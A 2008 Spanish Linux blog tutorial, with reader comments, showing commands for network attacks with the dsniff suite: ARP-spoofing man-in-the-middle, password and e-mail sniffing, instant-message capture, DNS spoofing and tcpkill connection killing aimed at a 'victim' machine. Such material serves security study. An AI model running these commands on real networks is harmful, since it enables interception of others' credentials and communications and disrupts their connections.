Ejemplos de ataques usando dsniff | Algo de Linux

martes, 16 de septiembre de 2008

Ejemplos de ataques usando dsniff

Como ya vimos en el post anterior, podemos hacer diversos ataques utilizando la suite dsniff.

Estos ataques pueden ser realizados:
  • Sobre nuestra propia máquina, en cuyo caso podemos lanzarlos directamente.
  • Sobre otra máquina de la red. En este caso, lanzamos primero un ataque MITM y después el ataque que queramos.
Ejemplos de ataques usando la suite dsniff:

* Obtención de contraseñas de la máquina atacada.
Si el ataque se hace sobre nuestra propia máquina, ejecutamos el siguiente comando directamente en una consola:
# dsniff -i eth0

Si el ataque lo hacemos sobre otra máquina de la red:

Primero hacemos una ataque MITM:
# echo 1 > /proc/sys/net/ipv4/ip_forward
# arpspoof -i eth0 -t IProuter IPmaquinaatacada
# arpspoof -i eth0 -t IPmaquinaatacada IProuter

Y luego, en otra consola, lanzamos el dsniff:
# dsniff -i eth0

* Captura de correos enviados y recibidos por la máquina víctima del ataque.
Igual que en todos los casos: Si lanzamos el ataque sobre nuestra propia máquina, lo hacemos directamente. Si lo hacemos sobre otra máquina de la red, primero lanzamos un ataque MITM.

# mailsnarf -i eth0

Con ésto obtendremos tanto los mensajes enviados por la víctima como los recibidos.
Ojo! Con esta herramienta no obtendremos los webmail.

* Captura de conversaciones de mensajería instantánea de AOL Instant Messenger, ICQ 2000, IRC, MSN Messenger, o Yahoo Messenger.

# msgsnarf -i eth0

* Ataque de dnsspofing.
Este ataque nos permite engañar a la víctima, para que cuando pregunte por un nombre de dominio, por ejemplo, al intentar entrar en una página web, lo redirijamos a otra máquina.
En el ejemplo hemos utilizado un fichero en el que hacemos la asociación entre la ip y el nombre de dominio.

# dnsspoof -i wlan0 -f dnsspoof.hosts

Ahora, si en el fichero dnsspoof.hosts, incluimos una línea como la siguiente:
127.0.0.1 *.doubleclick.net

Cada vez que nuestra víctima intente entrar en una web del dominio doubleclick.net, será redirigida a nuestra propia máquina.

Otra cosa: Si hemos instalado la suite en nuestro equipo, en /usr/share/dsniff/ encontraremos un fichero dnsspoof.hosts de ejemplo.
En este fichero los nombres de hosts pueden contener comodines (*).

* Matar conexiones establecidas.
A veces podemos querer matar conexiones establecidas en la máquina víctima.

# tcpkill -i eth0 dst 192.168.1.101 and dst port 27015

El comando anterior mata las conexiones que tienen como destino la máquina cuya IP es 192.168.1.101 por el puerto 27015, un puerto usado por el servidor del juego Half-Life.

Otro ejemplo. Imaginemos que queremos matar las conexiones de la víctima con el dominio www.microsoft.com:

# tcpkill -i eth0 host www.microsoft.com

3 comentarios:

Filthy dijo...

fantástico, simplemente...
la cuestión es, para el DNS spoofing, también hace falta MITM?

Esteban M. Navas dijo...

El DNS Spoofing es un MITM, a nivel de DNS en lugar de ARP.

Anónimo dijo...

mmmm... bueno... perdonar mi ignoracia pero una vez escritos esos comandos como accedo a los datos